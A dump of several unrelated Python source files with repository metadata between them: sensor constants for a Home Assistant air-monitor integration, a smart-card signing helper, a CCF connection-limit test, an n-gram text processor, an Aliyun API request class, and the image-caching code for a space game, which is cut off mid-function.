from datetime import timedelta
from typing import Final
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
SensorEntityDescription,
)
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
DEVICE_CLASS_CO2,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_SIGNAL_STRENGTH,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_TIMESTAMP,
PERCENTAGE,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
TEMP_CELSIUS,
)
SUFFIX_P0: Final = "_p0"
SUFFIX_P1: Final = "_p1"
SUFFIX_P2: Final = "_p2"
SUFFIX_P4: Final = "_p4"
ATTR_BME280_HUMIDITY: Final = "bme280_humidity"
ATTR_BME280_PRESSURE: Final = "bme280_pressure"
ATTR_BME280_TEMPERATURE: Final = "bme280_temperature"
ATTR_BMP280_PRESSURE: Final = "bmp280_pressure"
ATTR_BMP280_TEMPERATURE: Final = "bmp280_temperature"
ATTR_DHT22_HUMIDITY: Final = "dht22_humidity"
ATTR_DHT22_TEMPERATURE: Final = "dht22_temperature"
ATTR_HECA_HUMIDITY: Final = "heca_humidity"
ATTR_HECA_TEMPERATURE: Final = "heca_temperature"
ATTR_MHZ14A_CARBON_DIOXIDE: Final = "mhz14a_carbon_dioxide"
ATTR_SDS011: Final = "sds011"
ATTR_SDS011_P1: Final = f"{ATTR_SDS011}{SUFFIX_P1}"
ATTR_SDS011_P2: Final = f"{ATTR_SDS011}{SUFFIX_P2}"
ATTR_SHT3X_HUMIDITY: Final = "sht3x_humidity"
ATTR_SHT3X_TEMPERATURE: Final = "sht3x_temperature"
ATTR_SIGNAL_STRENGTH: Final = "signal"
ATTR_SPS30: Final = "sps30"
ATTR_SPS30_P0: Final = f"{ATTR_SPS30}{SUFFIX_P0}"
ATTR_SPS30_P1: Final = f"{ATTR_SPS30}{SUFFIX_P1}"
ATTR_SPS30_P2: Final = f"{ATTR_SPS30}{SUFFIX_P2}"
ATTR_SPS30_P4: Final = f"{ATTR_SPS30}{SUFFIX_P4}"
ATTR_UPTIME: Final = "uptime"
DEFAULT_NAME: Final = "Nettigo Air Monitor"
DEFAULT_UPDATE_INTERVAL: Final = timedelta(minutes=6)
DOMAIN: Final = "nam"
MANUFACTURER: Final = "Nettigo"
MIGRATION_SENSORS: Final = [
("temperature", ATTR_DHT22_TEMPERATURE),
("humidity", ATTR_DHT22_HUMIDITY),
]
SENSORS: Final[tuple[SensorEntityDescription, ...]] = (
SensorEntityDescription(
key=ATTR_BME280_HUMIDITY,
name=f"{DEFAULT_NAME} BME280 Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BME280_PRESSURE,
name=f"{DEFAULT_NAME} BME280 Pressure",
unit_of_measurement=PRESSURE_HPA,
device_class=DEVICE_CLASS_PRESSURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BME280_TEMPERATURE,
name=f"{DEFAULT_NAME} BME280 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BMP280_PRESSURE,
name=f"{DEFAULT_NAME} BMP280 Pressure",
unit_of_measurement=PRESSURE_HPA,
device_class=DEVICE_CLASS_PRESSURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BMP280_TEMPERATURE,
name=f"{DEFAULT_NAME} BMP280 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_HECA_HUMIDITY,
name=f"{DEFAULT_NAME} HECA Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_HECA_TEMPERATURE,
name=f"{DEFAULT_NAME} HECA Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_MHZ14A_CARBON_DIOXIDE,
name=f"{DEFAULT_NAME} MH-Z14A Carbon Dioxide",
unit_of_measurement=CONCENTRATION_PARTS_PER_MILLION,
device_class=DEVICE_CLASS_CO2,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SDS011_P1,
name=f"{DEFAULT_NAME} SDS011 Particulate Matter 10",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SDS011_P2,
name=f"{DEFAULT_NAME} SDS011 Particulate Matter 2.5",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SHT3X_HUMIDITY,
name=f"{DEFAULT_NAME} SHT3X Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SHT3X_TEMPERATURE,
name=f"{DEFAULT_NAME} SHT3X Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P0,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 1.0",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P1,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 10",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P2,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 2.5",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P4,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 4.0",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_DHT22_HUMIDITY,
name=f"{DEFAULT_NAME} DHT22 Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_DHT22_TEMPERATURE,
name=f"{DEFAULT_NAME} DHT22 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SIGNAL_STRENGTH,
name=f"{DEFAULT_NAME} Signal Strength",
unit_of_measurement=SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
device_class=DEVICE_CLASS_SIGNAL_STRENGTH,
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_UPTIME,
name=f"{DEFAULT_NAME} Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_registry_enabled_default=False,
),
)
| 35.11165 | 69 | 0.72819 |
0617c24b5f530cfc306b89618fff1f73b328c8b7 | 3,521 | py | Python | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | null | null | null | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | null | null | null | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | 2 | 2019-12-02T21:46:39.000Z | 2019-12-09T21:54:08.000Z | '''
Created by Simon Possegger on 12.11.2019 as part of the Infineon Hackathon.
This Class asynchronously reads from the card reader
and provides the needed functions to interact with the Infineon Blockchain Security 2Go cards.
'''
import blocksec2go
import hashlib
import os
import json
def initReading():
reader = get_reader()
if reader:
activate_card(reader)
return reader
def get_reader():
reader = None
reader_name = 'Identiv uTrust 3700 F'
while reader is None:
try:
reader = blocksec2go.find_reader(reader_name)
print('Found reader %s' % reader_name)
except Exception as details:
if ('No reader found' == str(details)):
print('No card reader found!', end='\r')
elif ('No card on reader' == str(details)):
print('Found reader, but no card!', end='\r')
else:
print('ERROR: ' + str(details))
raise SystemExit
return reader
def activate_card(reader):
try:
blocksec2go.select_app(reader)
print('Found reader and Security 2Go card!')
except Exception as details:
print('ERROR: %s' % str(details))
raise SystemExit
# Returns true if the card was initiated
def initCard(reader):
try:
if reader is not None:
key_id = blocksec2go.generate_keypair(reader)
print("Generated key on slot: %s" % str(key_id))
return True
else:
return False
except:
return False
def read_public_key(reader, key_id):
try:
if blocksec2go.is_key_valid(reader, key_id): # Check if key is valid
global_counter, counter, key = blocksec2go.get_key_info(reader, key_id)
return key
else:
return None
except Exception as details:
print('ERROR: ' + str(details))
raise SystemExit
def auth(reader, pub):
return verifyPub(reader, pub)
def generateSignature(reader, json_object=None):
if json_object is None:
hash = (hashlib.sha256(b'Hash' + bytearray(os.urandom(10000)))).digest()
else:
block_string = json.dumps(json_object, sort_keys=True)
hash_object = hashlib.sha256(block_string.encode())
hash = hash_object.digest()
try:
global_counter, counter, signature = blocksec2go.generate_signature(reader, 1, hash)
return hash, signature
except:
return None, None
def verifyPub(reader, pub, hash=None, signature=None):
# Generate random hash
if signature is None:
hash, signature = generateSignature(reader, hash)
try:
return blocksec2go.verify_signature(pub, hash, signature)
except Exception as ex:
print("Verification failed because of error: %s" % str(ex))
return False
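# Minimal sign-and-verify sketch (assumes a connected reader and a card already
# initialised with a key in slot 1; shown for illustration only):
#   reader = initReading()
#   pub = read_public_key(reader, 1)
#   digest, signature = generateSignature(reader, {"payload": "example"})
#   print(verifyPub(reader, pub, digest, signature))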
# testing:
def test():
reader = initReading()
print("Testing read pub:")
pub = read_public_key(reader, 1)
if pub is not None:
print(pub.hex())
else:
print("No pub yet... creating one")
print("Testing init card")
print(initCard(reader))
print("Testing read pub again:")
pub = read_public_key(reader, 1)
print(pub.hex())
print("Testing auth:")
print(auth(reader, read_public_key(reader, 1)))
print("Testing verify pub with custom hash")
hash = (hashlib.sha256(b'OtherHash' + bytearray(os.urandom(10000)))).digest()
print(verifyPub(reader, read_public_key(reader, 1), hash)) | 29.099174 | 94 | 0.629367 |
3204e2fb7428c92292bc48b44385764f4b3d8e26 | 4,046 | py | Python | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import infra.e2e_args
import time
import infra.network
import infra.proc
import infra.checker
import contextlib
import resource
import psutil
from loguru import logger as LOG
def run(args):
hosts = ["localhost"] * (4 if args.consensus == "pbft" else 1)
with infra.network.network(
hosts, args.binary_dir, args.debug_nodes, args.perf_nodes, pdb=args.pdb
) as network:
check = infra.checker.Checker()
network.start_and_join(args)
primary, _ = network.find_nodes()
primary_pid = primary.remote.remote.proc.pid
num_fds = psutil.Process(primary_pid).num_fds()
max_fds = num_fds + 150
LOG.success(f"{primary_pid} has {num_fds} open file descriptors")
resource.prlimit(primary_pid, resource.RLIMIT_NOFILE, (max_fds, max_fds))
LOG.success(f"set max fds to {max_fds} on {primary_pid}")
nb_conn = (max_fds - num_fds) * 2
clients = []
with contextlib.ExitStack() as es:
LOG.success(f"Creating {nb_conn} clients")
for i in range(nb_conn):
try:
clients.append(es.enter_context(primary.client("user0")))
LOG.info(f"Created client {i}")
except OSError:
LOG.error(f"Failed to create client {i}")
# Creating clients may not actually create connections/fds. Send messages until we run out of fds
for i, c in enumerate(clients):
if psutil.Process(primary_pid).num_fds() >= max_fds:
LOG.warning(f"Reached fd limit at client {i}")
break
LOG.info(f"Sending as client {i}")
check(c.post("/app/log/private", {"id": 42, "msg": "foo"}), result=True)
try:
clients[-1].post("/app/log/private", {"id": 42, "msg": "foo"})
except Exception:
pass
else:
assert False, "Expected error due to fd limit"
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
LOG.info("Disconnecting clients")
clients = []
time.sleep(1)
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
with contextlib.ExitStack() as es:
to_create = max_fds - num_fds + 1
LOG.success(f"Creating {to_create} clients")
for i in range(to_create):
clients.append(es.enter_context(primary.client("user0")))
LOG.info(f"Created client {i}")
for i, c in enumerate(clients):
if psutil.Process(primary_pid).num_fds() >= max_fds:
LOG.warning(f"Reached fd limit at client {i}")
break
LOG.info(f"Sending as client {i}")
check(c.post("/app/log/private", {"id": 42, "msg": "foo"}), result=True)
try:
clients[-1].post("/app/log/private", {"id": 42, "msg": "foo"})
except Exception:
pass
else:
assert False, "Expected error due to fd limit"
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
LOG.info("Disconnecting clients")
clients = []
time.sleep(1)
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
if __name__ == "__main__":
def add(parser):
parser.add_argument(
"-p",
"--package",
help="The enclave package to load (e.g., liblogging)",
default="liblogging",
)
args = infra.e2e_args.cli_args(add)
run(args)
| 36.125 | 109 | 0.571181 |
c6c5c9fbffacf421b23da843e42643cab295bc09 | 5,465 | py | Python | chrome/content/papermachines/processors/ngrams.py | papermachines/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 134 | 2015-01-04T11:29:04.000Z | 2022-03-30T22:39:51.000Z | chrome/content/papermachines/processors/ngrams.py | wisliyao/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 20 | 2015-02-06T18:42:31.000Z | 2021-11-07T05:19:03.000Z | chrome/content/papermachines/processors/ngrams.py | wisliyao/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 16 | 2015-02-14T18:46:58.000Z | 2020-07-24T02:38:11.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import json
import logging
import traceback
import codecs
import re
import math
import pickle
import copy
import itertools
from collections import Counter, defaultdict
from datetime import datetime
import textprocessor
class NGrams(textprocessor.TextProcessor):
"""
Generate N-grams for a corpus
"""
def _basic_params(self):
self.name = 'ngrams'
self.interval = int(self.named_args.get('interval', 1))
self.min_df = int(self.named_args.get('min_df', 1))
self.n = int(self.named_args.get('n', 1))
self.n = min(max(self.n, 1), 5)
self.top_ngrams = int(self.named_args.get('top_ngrams', 100))
self.start_date = None
self.end_date = None
if self.named_args.get('start_date', '') != '':
try:
self.start_date = \
datetime.strptime(self.named_args['start_date'],
'%Y-%m-%d')
except:
                logging.error('Start date {:} not valid! Must be formatted like 2013-01-05'
                              .format(self.named_args['start_date']))
if self.named_args.get('end_date', '') != '':
try:
self.end_date = \
datetime.strptime(self.named_args['end_date'],
'%Y-%m-%d')
except:
                logging.error('End date {:} not valid! Must be formatted like 2013-01-05'
                              .format(self.named_args['end_date']))
def _findNgramFreqs(self, filenames):
freqs = Counter()
total_for_interval = 0.0
for filename in filenames:
doc_freqs = self.getNgrams(filename, n=self.n)
for (ngram, value) in doc_freqs.iteritems():
self.doc_freqs[ngram].append(self.metadata[filename]['itemID'
])
freqs[ngram] += value
total_for_interval += float(value)
self.update_progress()
for key in freqs.keys():
freqs[key] /= total_for_interval
return freqs
def _filter_by_df(self):
all_ngrams = len(self.doc_freqs.keys())
rejected = set()
for key in self.doc_freqs.keys():
if len(self.doc_freqs[key]) < self.min_df:
rejected.add(key)
del self.doc_freqs[key]
kept = len(self.doc_freqs.keys())
logging.info('{:} ngrams below threshold'.format(len(rejected)))
logging.info('{:}/{:} = {:.0%} ngrams occured in {:} or more documents'.format(kept,
all_ngrams, 1.0 * kept / all_ngrams, self.min_df))
for interval in self.freqs.keys():
for ngram_text in self.freqs[interval].keys():
if ngram_text in rejected:
del self.freqs[interval][ngram_text]
# rev_enumerate = lambda a: itertools.izip(a, xrange(len(a)))
# self.num_to_ngram = self.doc_freqs.keys()
# self.ngram_to_num = dict(rev_enumerate(self.num_to_ngram))
def _filter_by_avg_value(self):
avg_values = {}
intervals_n = float(len(self.interval_names))
for (ngram, values_over_time) in \
self.ngrams_intervals.iteritems():
avg_values[ngram] = sum(values_over_time) / intervals_n
avg_value_list = sorted(avg_values.values(), reverse=True)
logging.info('range of avg frequencies: {:} to {:}'.format(avg_value_list[-1],
avg_value_list[0]))
min_value = avg_value_list[min(self.top_ngrams - 1,
len(avg_value_list) - 1)]
logging.info('minimum avg ngram frequency: {:%}'.format(min_value))
for (ngram, value) in avg_values.iteritems():
if value < min_value:
del self.ngrams_intervals[ngram]
def process(self):
self.labels = defaultdict(set)
self.split_into_intervals()
self.freqs = {}
self.doc_freqs = defaultdict(list)
self.occupied_intervals = sorted(self.labels.keys())
for interval in self.occupied_intervals:
current_docs = self.labels[interval]
self.freqs[interval] = self._findNgramFreqs(current_docs)
logging.info('ngram counts complete')
self._filter_by_df()
self.ngrams_intervals = {}
for (i, interval) in enumerate(self.interval_names):
if interval in self.occupied_intervals:
ngrams = self.freqs[interval]
for (ngram, value) in ngrams.iteritems():
if ngram not in self.ngrams_intervals:
self.ngrams_intervals[ngram] = [0.0 for x in
self.interval_names]
self.ngrams_intervals[ngram][i] = value
self._filter_by_avg_value()
self.max_freq = max([max(l) for l in
self.ngrams_intervals.values()])
# self.ngrams_intervals = dict((self.num_to_ngram[ngram], values) for ngram, values in self.ngrams_intervals.iteritems())
params = {
'NGRAMS_INTERVALS': self.ngrams_intervals,
'TIMES': self.interval_names,
'MAX_FREQ': self.max_freq,
'NGRAMS_TO_DOCS': dict(self.doc_freqs),
}
self.write_html(params)
if __name__ == '__main__':
try:
processor = NGrams(track_progress=True)
processor.process()
except:
logging.error(traceback.format_exc())
| 35.258065 | 129 | 0.570906 |
8c8cb577623e23d742cde2a67e777dfe41cb3f41 | 1,657 | py | Python | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeDcdnDomainRealTimeSrcBpsDataRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dcdn', '2018-01-15', 'DescribeDcdnDomainRealTimeSrcBpsData')
def get_StartTime(self):
return self.get_query_params().get('StartTime')
def set_StartTime(self,StartTime):
self.add_query_param('StartTime',StartTime)
def get_DomainName(self):
return self.get_query_params().get('DomainName')
def set_DomainName(self,DomainName):
self.add_query_param('DomainName',DomainName)
def get_EndTime(self):
return self.get_query_params().get('EndTime')
def set_EndTime(self,EndTime):
self.add_query_param('EndTime',EndTime)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | 34.520833 | 90 | 0.765238 |
1dca48c3faa8e9790295a4d7ca41de98cd149df0 | 17,118 | py | Python | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 5 | 2019-03-01T04:03:31.000Z | 2019-07-28T21:04:20.000Z | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 19 | 2019-03-26T03:59:55.000Z | 2019-06-26T17:01:16.000Z | Kessler-Syndrome/graphics.py | Starbuck5/Kessler-Syndrome | 9a85291cc9bd42bfa0a1e949bfb91a973c8e9d43 | [
"Apache-2.0"
] | 9 | 2019-02-26T03:13:35.000Z | 2019-10-10T02:44:46.000Z | from pgx import pointsToRect
from game import Rotate
from pgx import rotatePixelArt
from pgx import scaleImage
from pgx import Texthelper
from pgx import loadImage
from pgx import spriteSheetBreaker
import pygame
import pgx
from pygame import gfxdraw
#accepts a surface that supports palettes (gifs) and changes the color palette based on preference
#current and new colors are tuples of rgba (r, g, b, a)
def change_color(image, currentColor, newColor, toReturn = False):
palette = image.get_palette()
palette = list(palette)
index = -1
    for i in range(len(palette)): #search the whole palette, not just the first 255 entries
if palette[i] == currentColor:
index = i
break
if index == -1:
raise Exception("no such currentColor found in image")
palette[index] = newColor
if toReturn:
newImage = image.copy()
newImage.set_palette(palette)
return newImage
image.set_palette(palette)
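# Example (the asset and palette colors below are the star graphics used in init()):
#   star = loadImage("images/star.gif")
#   change_color(star, (255, 216, 0, 255), (255, 130, 0, 255))                  # recolor in place
#   orange = change_color(star, (255, 216, 0, 255), (255, 160, 0, 255), True)   # recolored copy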
class Images:
storage = {}
bounding_rects = {}
def add(name, image, **kwargs): #or (ID, dictionary of rotations)
image = Images._processImage(image, **kwargs)
Images.storage[name] = image
Images.bounding_rects[name] = image.get_bounding_rect()
def addRotate(ID, image, **kwargs): #takes an ID and a surface and adds the dictionary of its rotations to Images storage
image = Images._processImage(image, **kwargs)
rotatedict = {}
rectdict = {}
for j in range(36):
rotatedImage = rotatePixelArt(image, j*10)
rotatedict[j*10] = rotatedImage
rectdict[j*10] = rotatedImage.get_bounding_rect()
Images.storage[ID] = rotatedict
Images.bounding_rects[ID] = rectdict
def _processImage(image, **kwargs):
if "colorkey" in kwargs:
image.set_colorkey(kwargs["colorkey"])
return image
def get(name, *args): #arg = rotation value
if not args:
return Images.storage[name]
var = args[0]
var /= 10
var = round(var)
var *= 10
var = int(var)
var %= 360
return Images.storage[name][var]
def getRect(name, *args):
if not args:
return Images.bounding_rects[name]
var = args[0]
var /= 10
var = round(var)
var *= 10
var = int(var)
var %= 360
return Images.bounding_rects[name][var]
#method used to get hitbox by looking at the image stored in Images class
    #to use the later parameters when calling, the default parameters before them must be set explicitly
#beFancy - True = use bounding rects of data ------ False = use image size alone
def getHitbox(xpos, ypos, name, rotation, centered=True, beFancy=True, realRotation=False):
if isinstance(rotation, str):
image = Images.get(name)
elif realRotation:
image = rotatePixelArt(Images.get(name), rotation)
else:
image = Images.get(name, rotation)
if beFancy:
if isinstance(rotation, str):
bound = Images.getRect(name)
elif realRotation:
image = rotatePixelArt(Images.get(name), rotation)
bound = image.get_bounding_rect()
else:
bound = Images.getRect(name, rotation)
else:
bound = image.get_rect()
if centered:
return bound.move(xpos-0.5*image.get_width(), ypos-0.5*image.get_height())
return bound.move(xpos, ypos)
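    # Example (mirrors the calls made in crayprinter() below):
    #   hit_box = Images.getHitbox(xpos, ypos, 9, rotation.getRotation())
    #   Images.scaleHitbox(hit_box, scale)   # optionally inflate it afterwards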
#inflates a centered hitbox outwards using a scalar
def scaleHitbox(hitBox, scale):
hitBox[0] -= hitBox[2]*0.5*scale
hitBox[1] -= hitBox[3]*0.5*scale
hitBox[2] *= scale
hitBox[3] *= scale
#helps with caching of rotated asteroid images
def rotationCachingHelper(filepath, spritesheetWidth, spritesheetHeight, spritesheetRows, spritesheetColumns, idIntercept, scalar2):
asteroids = loadImage(filepath)
asteroids.set_colorkey((255,255,255))
asteroids = spriteSheetBreaker(asteroids, spritesheetWidth, spritesheetHeight, 0, 0, spritesheetRows, spritesheetColumns)
for i in range(len(asteroids)):
asteroids[i] = scaleImage(asteroids[i], scalar2)
for i in range(len(asteroids)):
Images.addRotate(idIntercept + i, asteroids[i])
#must be called after scaling is fully set up, not before
#starts image caching of rotated images
def init(d_asteroids, d_parts, d_sats, graphlist, scalar2, scalar3, scalarscalar):
#adding all asteroid images/rotations
rotationCachingHelper("images/smallasteroids.gif", 40, 40, 1, 4, 70, scalar2)
rotationCachingHelper("images/mediumasteroids.gif", 50, 50, 1, 4, 80, scalar2)
rotationCachingHelper("images/largeasteroids.gif", 80, 80, 2, 4, 90, scalar2)
#adding all satellites and parts images/rotations
pixelStuff = d_parts + d_sats
for i in range(len(pixelStuff)):
surf = graphlist[pixelStuff[i] - 10]
Images.addRotate(pixelStuff[i], surf)
#adding images for info bars
Images.add("fuelpic", scaleImage(loadImage("images/fuelcanister.tif"), 2*scalarscalar))
Images.add("armorpic", scaleImage(loadImage("images/armor.tif"), scalarscalar))
Images.add("shotpic", scaleImage(loadImage("images/missile.png"), scalarscalar), colorkey=(255,255,255))
#adding other icons
Images.add("infinity", scaleImage(loadImage("images/infinity.tif"), scalarscalar))
Images.add("pygamebadge", scaleImage(loadImage("images/pygame-badge-SMA-unscaled.png"), 2.5*scalarscalar))
#adding miscellaneous other object images
Images.add(0, scaleImage(loadImage("images/zvezda.png"), 2*scalarscalar))
Images.addRotate(7, scaleImage(loadImage("images/alienMines.tif"), 2*scalarscalar))
Images.add(9, scaleImage(loadImage("images/ionblast.png"), .5*scalarscalar))
#aliens
Images.addRotate(120, scaleImage(loadImage("images/aliendrone.gif"), 2*scalarscalar), colorkey=(255,255,255))
Images.addRotate(121, scaleImage(loadImage("images/spiker.gif"), 2*scalarscalar), colorkey=(255,255,255))
Images.addRotate(122, scaleImage(loadImage("images/alienshot.gif"), scalarscalar), colorkey=(255,255,255))
#aliens - alien mines
imageList = spriteSheetBreaker(loadImage("images/alienbomb.gif"), 19, 19, 0, 0, 1, 6)
for i in range(len(imageList)):
image = imageList[i]
image.set_colorkey((255,255,255))
image = scaleImage(image, 2*scalarscalar)
if i == 0:
Images.addRotate(123, image) #reference image at 123 for hitboxes
Images.addRotate(123 + (i+1)/100, image)
#adding different types of stars
base_star = loadImage("images/star.gif")
base_star_unscaled = base_star
base_star.set_colorkey((255,255,255))
base_star = scaleImage(base_star, scalarscalar)
Images.add(100, base_star)
Images.add(101, change_color(base_star, (255,216,0,255), (255, 160, 0, 255), True))
Images.add(102, change_color(base_star, (255,216,0,255), (255, 130, 0, 255), True))
base_star = scaleImage(base_star_unscaled, 2*scalarscalar)
Images.add(103, base_star)
Images.add(104, change_color(base_star, (255,216,0,255), (255, 160, 0, 255), True))
Images.add(105, change_color(base_star, (255,216,0,255), (255, 130, 0, 255), True))
#adding ship, no rotation because it rotates in real time
#loads up spritesheet and loads them all up under separate IDs
imageList = spriteSheetBreaker(loadImage("images/ships.png"), 24, 60, 0, 0, 1, 5)
for i in range(len(imageList)):
imageList[i].set_colorkey((255,255,255))
imageList[i] = scaleImage(imageList[i], scalar3)
Images.add(1.1, imageList[0])
Images.add(1.2, imageList[1])
Images.add(1.3, imageList[2])
Images.add(1.4, imageList[3])
Images.add(1.5, imageList[4])
#adding downed fighters
imageList = spriteSheetBreaker(loadImage("images/fighters.gif"), 42, 22, 0, 0, 2, 2)
for i in range(len(imageList)):
imageList[i].set_colorkey((255,255,255))
imageList[i] = scaleImage(imageList[i], 1.1*scalarscalar)
Images.addRotate(130+i, imageList[i])
#adding derelict ship, no rotation because it's always in the same orientation
image = scaleImage(loadImage("images/derelict.gif"), scalarscalar)
image.set_colorkey((255,255,255))
change_color(image, (0,0,0,255), (25,25,25,255))
Images.add(110, image)
#adding president's ship
Images.addRotate(666, scaleImage(loadImage("images/president.png"), scalarscalar), colorkey=(255,255,255))
#reorders the list so it will print in the correct order
background = [100, 101, 102, 103, 104, 105, 106, 107, 108, 109]
ship = [1,5]
def reorderObjectList(object_list):
newObject_list = []
for i in range(3):
for j in range(0, len(object_list), 8):
object_number = object_list[j+4]
if object_number in background and i == 0:
newObject_list += object_list[j:j+8]
elif object_number in ship and i == 1:
newObject_list += object_list[j:j+8]
elif object_number not in ship and object_number not in background and i == 2:
newObject_list += object_list[j:j+8]
